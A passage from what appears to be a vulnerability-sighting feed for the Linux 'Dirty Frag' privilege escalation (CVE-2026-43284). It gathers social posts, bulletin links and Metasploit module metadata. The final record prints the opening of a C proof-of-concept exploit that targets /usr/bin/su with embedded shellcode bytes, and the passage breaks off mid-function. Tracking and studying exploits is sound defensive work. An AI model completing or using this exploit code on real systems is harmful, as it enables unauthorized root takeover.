\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u044f\u0434\u0440\u0430 \u0434\u043b\u044f \u0441\u0432\u043e\u0435\u0439 \u0441\u0440\u0435\u0434\u044b \u043b\u0438\u0431\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0442\u043e\u0442 \u0436\u0435 \u043c\u0435\u0442\u043e\u0434 \u0437\u0430\u0449\u0438\u0442\u044b, \u0447\u0442\u043e \u0438 \u0434\u043b\u044f \u043a\u043e\u043c\u0430\u043d\u0434 Dirty Frag, \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043c\u043e\u0434\u0443\u043b\u0435\u0439 \u044f\u0434\u0440\u0430.\n\n\u041f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u0447\u0442\u043e Fragnasia \u043f\u043e\u044f\u0432\u0438\u043b\u043e\u0441\u044c \u0438\u043c\u0435\u043d\u043d\u043e \u0432 \u0442\u043e\u0442 \u043c\u043e\u043c\u0435\u043d\u0442, \u043a\u043e\u0433\u0434\u0430 \u043f\u0435\u0440\u0435\u0434 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430\u043c\u0438 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux \u0441\u0442\u043e\u0438\u0442 \u0434\u0440\u0443\u0433\u0430\u044f \u043d\u0435 \u043c\u0435\u043d\u0435\u0435 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f \u0437\u0430\u0434\u0430\u0447\u0430 - \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0438\u0442\u044c Copy Fail, \u0435\u0449\u0435 \u043e\u0434\u043d\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0443\u044e \u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f.\n\n\u041f\u0440\u0438 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432 \u0430\u043f\u0440\u0435\u043b\u0435\u00a0\u0432 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430\u00a0\u0435\u0449\u0435 \u043e\u0434\u043d\u0443 EoP-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c  (\u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 Pack2TheRoot) \u0432 \u0434\u0435\u043c\u043e\u043d\u0435 PackageKit, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0430\u0441\u044c \u043d\u0435\u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u043e\u0439 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0434\u0435\u0441\u044f\u0442\u0438 \u043b\u0435\u0442.", "creation_timestamp": "2026-05-14T14:01:34.000000Z"}, {"uuid": "82ae92e0-a30c-4242-a2cd-44428cd4739e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/echobit.de/post/3mlthd2agk222", "content": "Linux is most secure OS. Yes. It's perfectly safe\u2026\n\n- Dirty Cow (CVE-2016-5195)\n- Dirty Pipe (CVE-2022-0847)\n- io_uring UAF (CVE-2022-2602)\n- Copy Fail (CVE-2026-31431)\n- Dirty Frag (CVE-2026-43284\n- Fragnesia (CVE-2026-46300)\n\n\u2026 so you have that many methods to recover your root password. \ud83d\ude02", "creation_timestamp": "2026-05-14T18:34:51.870840Z"}, {"uuid": "49c624e8-2670-4582-8e7f-32cfc9f45222", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlubzmjy2i2u", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 147 interactions\nCVE-2026-43500: 99 interactions\nCVE-2026-31431: 72 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-46300: 39 interactions\nCVE-2026-42945: 17 interactions\nCVE-2026-31431: 14 interactions\n", "creation_timestamp": "2026-05-15T02:30:31.924464Z"}, {"uuid": "624f7913-e82e-4bd0-8931-4a5bfc4a93cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "published-proof-of-concept", "source": "Telegram/bDRsekGT6KsUOKSAQI-KSXDhypQzzgL-gjqbTcCXe2h_h6A", "content": "", "creation_timestamp": "2026-05-15T21:00:05.000000Z"}, {"uuid": "53117d67-f690-4d38-96ae-56e3908a44a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/redhat-linux-kernel-multiple-vulnerabilities_20260508", "content": "", "creation_timestamp": "2026-05-07T20:00:00.000000Z"}, {"uuid": "a8abd995-e89c-4fc4-a10b-33cec84bc552", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mlw3wxs6rk2z", "content": "Patching Dirty Frag (CVE-2026-43284/CVE-2026-43500) on Oracle Linux? This script works. But after you patch, you need to understand the next 0-day. Read more ->  tinyurl.com/b8hnx77h", "creation_timestamp": "2026-05-15T19:48:12.199220Z"}, {"uuid": "b209882e-d9b4-4608-8673-314c5193c89c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "published-proof-of-concept", "source": "Telegram/M2s3PphtTCD9brru-X6QMyPesFMqQlhfbVnnLWpusEfiV5g", "content": "", "creation_timestamp": "2026-05-16T21:00:04.000000Z"}, {"uuid": "f8698281-236d-42db-96db-d6ac701426c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mm4tzo4mas2k", "content": "The new \"Dirty Frag\" CVE (CVE-2026-43284) is another reminder: patches fix 1 problem.\nLearning to automate your response fixes ALL of them.  Read more -> tinyurl.com/ms2nbcy6  #SUSE #Security", "creation_timestamp": "2026-05-18T12:14:07.448861Z"}, {"uuid": "4d46a945-4f67-455a-9183-029c2f54b1e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1858", "content": "", "creation_timestamp": "2026-05-10T21:00:00.000000Z"}, {"uuid": "afc63e92-417a-42a4-8897-34e3a52b18a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mm4tzpnxe22k", "content": "The new \"Dirty Frag\" CVE (CVE-2026-43284) is another reminder: patches fix 1 problem.\nLearning to automate your response fixes ALL of them.  Read more -> tinyurl.com/ms2nbcy6  #SUSE #Security", "creation_timestamp": "2026-05-18T12:14:07.965828Z"}, {"uuid": "eb8515d1-8e98-4bd4-a450-3cf69d46b25a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mm4tzsmmnk2k", "content": "The new \"Dirty Frag\" CVE (CVE-2026-43284) is another reminder: patches fix 1 problem.\nLearning to automate your response fixes ALL of them.  Read more -> tinyurl.com/ms2nbcy6  #SUSE #Security", "creation_timestamp": "2026-05-18T12:14:08.485680Z"}, {"uuid": "a59ff050-c6f2-424a-9132-174342983a51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/GithubRedTeam/84810", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Dirty-Frag-CVE-2026-43284\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a kuniyal08\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-19 11:20:02\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA report on Dirty Frag, which is a Linux Local Privilege Escalation (LPE) vulnerability chain that allows an unprivileged user to gain root access\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-19T12:00:04.000000Z"}, {"uuid": "0e7eb107-feee-4b60-b3f5-2c0c96d24ec7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyqvvbua2x", "content": "\ud83d\udd17 CVE : CVE-2025-21999, CVE-2025-38024, CVE-2025-71238, CVE-2026-23191, CVE-2026-23243, CVE-2026-23401, CVE-2026-31419, CVE-2026-31532, CVE-2026-43284, CVE-2026-46300, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:12.275359Z"}, {"uuid": "eb7d7ef7-8ea5-46a8-aba8-385c528019b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43284", "type": "seen", "source": "https://bsky.app/profile/cyberveille-ch.bsky.social/post/3mmbp6a4fv22r", "content": "\ud83d\udce2 Dirty Frag : deux vuln\u00e9rabilit\u00e9s Linux (CVE-2026-43284 et CVE-2026-43500) permettent une \u00e9l\u00e9vation de privil\u00e8ge\u2026\ud83d\udcdd \u2026\nhttps://cyberveille.ch/posts/2026-05-20-dirty-frag-deux-vulnerabilites-linux-cve-2026-43284-et-cve-2026-43500-permettent-une-elevation-de-privileges-root/ #CVE_2026_43284 #Cyberveil\u2026", "creation_timestamp": "2026-05-20T10:30:22.885466Z"}, {"uuid": "20bf30a0-94fc-4db4-9826-9b58071a0fb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2026_43284_dirty_frag.rb", "content": "{\"actions\": [], \"aliases\": [], \"arch\": \"cmd\", \"author\": [\"Hyunwoo Kim\", \"Giovanni Heward\"], \"autofilter_ports\": [], \"autofilter_services\": [], \"check\": true, \"default_credential\": false, \"description\": \"CVE-2026-43284 is a Linux kernel page-cache write vulnerability in the IPsec/xfrm\\n          subsystem affecting ESP (Encapsulating Security Payload) fragmentation. Dubbed\\n          \\\"DirtyFrag\\\", the bug allows a local unprivileged user to gain write access to read-only\\n          page-cache pages by triggering a race condition in how the kernel handles shared fragments\\n          when processing ESP-encapsulated UDP packets. The exploit overwrites a SUID binary on disk\\n          to execute an arbitrary payload as root.\", \"disclosure_date\": \"2026-05-08\", \"fullname\": \"exploit/linux/local/cve_2026_43284_dirty_frag\", \"is_install_path\": true, \"mod_time\": \"2026-05-21 11:49:08 +0000\", \"name\": \"xfrm-ESP Page-Cache Write via CVE-2026-43284\", \"needs_cleanup\": true, \"notes\": {\"Reliability\": [\"repeatable-session\"], \"SideEffects\": [\"artifacts-on-disk\", \"config-changes\"], \"Stability\": [\"crash-os-down\"]}, \"path\": \"/modules/exploits/linux/local/cve_2026_43284_dirty_frag.rb\", \"platform\": \"Linux,Unix\", \"post_auth\": false, \"rank\": 400, \"ref_name\": \"linux/local/cve_2026_43284_dirty_frag\", \"references\": [\"CVE-2026-43284\", \"URL-https://github.com/V4bel/dirtyfrag\"], \"rport\": null, \"session_types\": [\"shell\", \"meterpreter\"], \"targets\": [\"Auto\"], \"type\": \"exploit\"}", "creation_timestamp": "2026-05-21T10:50:23.000000Z"}, {"uuid": "0265085c-d3c2-448f-ac9f-18c820be194e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/packetstorm.bsky.social/post/3mmffih2k6725", "content": "Xfrm-ESP Page-Cache Write Via CVE-2026-43284 https://packetstorm.news/files/221745 #exploit", "creation_timestamp": "2026-05-21T21:47:46.410215Z"}, {"uuid": "cbf6c595-c7df-4e8a-a011-ae5193eaca04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "published-proof-of-concept", "source": "Telegram/YATBjGv1AUVJLpNMJm72RARmYZVz0VG6CIM_Ts3vJTWRmVw", "content": "", "creation_timestamp": "2026-05-19T09:00:04.000000Z"}, {"uuid": "f3e71561-bf3b-4609-ab54-842847125a94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "published-proof-of-concept", "source": "Telegram/LRuVHO_NRtLslMv_pxl3JYoJM5ygIHd_ktikilExPtpHxGM", "content": "", "creation_timestamp": "2026-05-20T15:00:07.000000Z"}, {"uuid": "4fa3dead-7272-48cb-9786-17c7e33b1a52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/GithubRedTeam/85248", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Dirtyfrag-go\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Koshmare-Blossom\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-21 15:55:35\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA Go implementation of dirtyfrag (CVE-2026-43284 / CVE-2026-43500)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-21T16:00:05.000000Z"}, {"uuid": "7b439be5-0f95-4046-b210-53f9df1a6ecd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyr4kgoa2u", "content": "\ud83d\udd17 CVE : CVE-2025-54518, CVE-2026-43284, CVE-2026-43500, CVE-2026-46300, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:18.197667Z"}, {"uuid": "368d7df7-5cad-46d6-9115-f69e6074b783", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/GithubRedTeam/85698", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Dirty-Frag-CVE-2026-43284\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a AtlasVector\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-24 13:58:54\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nLab detection exercise for DirtyFrag (CVE-2026-43284) - Linux kernel privilege escalation via xfrm-ESP page cache corruption. Full write-up covering exploit execution, detection gaps, and corrected EQL rules using Elastic Stack\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-24T14:00:04.000000Z"}, {"uuid": "eb76d8bc-506c-4ffd-ab13-b2ccd82dc72a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43284", "type": "seen", "source": "https://bsky.app/profile/sagabreakfast.bsky.social/post/3mmgv5vs5eb22", "content": "[1/7] \ud83d\udcf0 Dirty Frag Linux root exploit discovered in eight days, a significant security threat to Linux systems.\n\n\ud83d\udd17 https://www.copahost.com/blog/dirty-frag-cve-2026-43284/\n\n#Tech #Dev", "creation_timestamp": "2026-05-22T12:00:52.081210Z"}, {"uuid": "7788d62f-8bed-42b3-8881-88c333d24c1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mmhyt66qb227", "content": "\u30a2\u30af\u30c6\u30a3\u30d6\u653b\u6483\uff1aLinux\u306eDirty Frag\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u4fb5\u5bb3\u5f8c\u306e\u30ea\u30b9\u30af\u304c\u62e1\u5927\n\n\u300cDirty Frag\u300d\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u3001\u65b0\u305f\u306b\u660e\u3089\u304b\u306b\u306a\u3063\u305fLinux\u306e\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u3001esp4\u3001esp6\uff08CVE-2026-43284\uff09\u3001rxrpc\uff08CVE-2026-43500\uff09\u306a\u3069\u306e\u8106\u5f31\u306a\u30ab\u30fc\u30cd\u30eb\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u304a\u3088\u3073\u30e1\u30e2\u30ea\u30d5\u30e9\u30b0\u30e1\u30f3\u30c8\u51e6\u7406\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3092\u4ecb\u3057\u3066\u3001\u6a29\u9650\u306e\u306a\u3044\u30e6\u30fc\u30b6\u30fc\u304b\u3089root\u6a29\u9650\u3078\u306e\u6607\u683c\u304c\u53ef\u80fd\u306b\u306a\u308a\u307e\u3059\u3002\u516c\u958b\u3055\u308c\u305f\u5831\u544a\u3084\u6982\u5ff5\u5b9f\u8a3c\u6d3b\u52d5\u304b\u3089\u3001\u3053\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u5f93\u6765\u306e\u7af6\u5408\u72b6\u614b\u306b\u4f9d\u5b58\u3059\u308bLinux\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\u624b\u6cd5\u3088\u308a\u3082\u4fe1\u983c\u6027\u306e\u9ad8\u3044\u6a29\u9650\u6607\u683c\u3092\u5b9f\u73fe\u3059\u308b\u3088\u3046\u306b\u8a2d\u8a08\u3055\u308c\u3066\u3044\u308b...", "creation_timestamp": "2026-05-22T22:39:13.031425Z"}, {"uuid": "52d9277e-0e0b-4ad4-80ac-78fdbd8fce69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "Telegram/pekQneQSghJS9ruSll4_086gjVL0B0HejJCeE2Ffiq4w67c", "content": "", "creation_timestamp": "2026-05-21T23:00:10.000000Z"}, {"uuid": "6a4c35e7-119a-4e20-9970-88e1e4ff09f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "Telegram/Ob2oA_mupoVDMqE6Q_QCizAK8aYtg6z11DPx_SkAfocJmb0", "content": "", "creation_timestamp": "2026-05-24T21:00:04.000000Z"}, {"uuid": "b7a33323-9858-4443-9e2e-a6816a0a52e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mmjmx4xcxc27", "content": "\u300cLinux\u30ab\u30fc\u30cd\u30eb\u300d\u306e\u6697\u53f7\u901a\u4fe1\u51e6\u7406\u306bLoP\u8106\u5f31\u6027\u300cDirty Frag\u300d\n\n\u300cLinux\u30ab\u30fc\u30cd\u30eb\u300d\u306b\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027\u304c\u660e\u3089\u304b\u3068\u306a\u3063\u305f\u3002\u5225\u540d\u300cDirty Frag\u300d\u3068\u3082\u547c\u3070\u308c\u3066\u304a\u308a\u3001\u6982\u5ff5\u5b9f\u8a3c\u30b3\u30fc\u30c9\uff08PoC\uff09\u3082\u516c\u958b\u3055\u308c\u3066\u3044\u308b\u3002\n\n\u300cIPsec\u300d\u306b\u304a\u3044\u3066\u6697\u53f7\u5316\u3084\u6539\u3056\u3093\u691c\u77e5\u3092\u884c\u3046\u305f\u3081\u306b\u5229\u7528\u3055\u308c\u308b\u30d7\u30ed\u30c8\u30b3\u30eb\u300cESP\u300d\u306e\u51e6\u7406\u306b\u8106\u5f31\u6027\u300cCVE-2026-43284\u300d\u304c\u78ba\u8a8d\u3055\u308c\u305f\u3002\u300c\u540c4.11\u300d\u4ee5\u964d\u306e\u5e83\u7bc4\u306a\u30d0\u30fc\u30b8\u30e7\u30f3\u306b\u5f71\u97ff\u304c\u3042\u308a\u3001\u4e00\u90e8\u3067\u306f\u5225\u540d\u300cDirty Frag\u300d\u3068\u3082\u547c\u3070\u308c\u3066\u3044\u308b\u3002\n\n\u300cIPv4\u300d\u3084\u300cIPv6\u300d\u306e\u300cUDP\u300d\u306b\u304a\u3051\u308b\u300cESP\u300d\u3092\u51e6\u7406\u3059\u308b\u969b\u3001\u5171\u6709\u3057\u3066\u3044\u308b\u30e1\u30e2\u30ea\u9818\u57df\u3092\u4fdd\u8b77\u305b\u305a\u3001\u305d\u306e\u307e\u307e\u5fa9\u53f7...", "creation_timestamp": "2026-05-23T14:11:56.134960Z"}, {"uuid": "e02d2104-b8a1-4cf9-a1ca-919e6e816ed3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://gist.github.com/spynika/9c98aca892e18aff2b87d04aa69cc7d7", "content": "#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef UDP_ENCAP\n#define UDP_ENCAP 100\n#endif\n#ifndef UDP_ENCAP_ESPINUDP\n#define UDP_ENCAP_ESPINUDP 2\n#endif\n#ifndef SOL_UDP\n#define SOL_UDP 17\n#endif\n\n#define ENC_PORT       4500\n#define SEQ_VAL        200\n#define REPLAY_SEQ     100\n#define PATCH_OFFSET   0\n#define PAYLOAD_LEN    192\n#define ENTRY_OFFSET   0x78\n#define TOTAL_SAS      (PAYLOAD_LEN / 4)\n#define SPI_BASE       0xDEADBE10u\n\nstatic const char *g_target = \"/usr/bin/su\";\nstatic unsigned char g_backup[PAYLOAD_LEN];\nstatic int g_have_backup = 0;\n\nstatic int g_tty = 0;\nstatic int g_verbose = 0;\nstatic int g_setuid_count = 0;\nstatic int g_exploitable_count = 0;\n\n/* first instructions of embedded shell ELF at file offset 0x78 */\nstatic const uint8_t su_marker[8] = {\n\t0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0, 0xb0, 0x6a,\n};\n\n#define C_RST  \"\\033[0m\"\n#define C_DIM  \"\\033[2m\"\n#define C_RED  \"\\033[31m\"\n#define C_GRN  \"\\033[32m\"\n#define C_YEL  \"\\033[33m\"\n#define C_BLU  \"\\033[34m\"\n#define C_MAG  \"\\033[35m\"\n#define C_CYN  \"\\033[36m\"\n#define C_WHT  \"\\033[1;37m\"\n#define C_BOLD \"\\033[1m\"\n\n#define C(x) (g_tty ? (x) : \"\")\n\nstatic void print_banner(void)\n{\n\tprintf(\"\\n\");\n\tprintf(\"%s\", C(C_CYN));\n\tprintf(\"  \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\");\n\tprintf(\"  \u2551  SLEY - CVE-2026-43284 dirtyfrag PoC  \u2551\\n\");\n\tprintf(\"  \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\");\n\tprintf(\"%s\\n\", C(C_RST));\n}\n\nstatic void status_line(const char *label, int ok, const char *detail)\n{\n\tprintf(\"  %s[%s]%s %-22s\",\n\t       C(C_DIM), ok ? \"+\" : \"-\", C(C_RST), label);\n\tif (detail && detail[0])\n\t\tprintf(\" %s%s%s\", ok ? C(C_GRN) : C(C_RED), detail, C(C_RST));\n\tprintf(\"\\n\");\n}\n\nstatic void phase_header(int n, const char *title)\n{\n\tprintf(\"%s\u250c\u2500[%s phase %d%s] %s%s\\n\",\n\t       C(C_CYN), C(C_MAG), n, C(C_CYN), title, C(C_RST));\n}\n\nstatic int cfg_value_ok(const char *val, const char *expect)\n{\n\tif (!val || !*val)\n\t\treturn 0;\n\tif (strcmp(expect, \"ym\") == 0)\n\t\treturn val[0] == 'y' || val[0] == 'm';\n\treturn strcmp(val, expect) == 0;\n}\n\nstruct kconfig_req {\n\tconst char *key;\n\tconst char *expect;\n\tconst char *hint;\n\tchar val[32];\n\tint found;\n};\n\nstatic void scan_kconfig(FILE *f, struct kconfig_req *req, size_t nreq)\n{\n\tchar line[256];\n\n\tfor (size_t i = 0; i < nreq; i++) {\n\t\treq[i].val[0] = '\\0';\n\t\treq[i].found = 0;\n\t}\n\n\twhile (fgets(line, sizeof(line), f)) {\n\t\tfor (size_t i = 0; i < nreq; i++) {\n\t\t\tif (req[i].found)\n\t\t\t\tcontinue;\n\t\t\tsize_t klen = strlen(req[i].key);\n\t\t\tif (strncmp(line, req[i].key, klen) != 0 || line[klen] != '=')\n\t\t\t\tcontinue;\n\t\t\tconst char *v = line + klen + 1;\n\t\t\tsize_t n = strcspn(v, \"\\n\\r\");\n\t\t\tif (n >= sizeof(req[i].val))\n\t\t\t\tn = sizeof(req[i].val) - 1;\n\t\t\tmemcpy(req[i].val, v, n);\n\t\t\treq[i].val[n] = 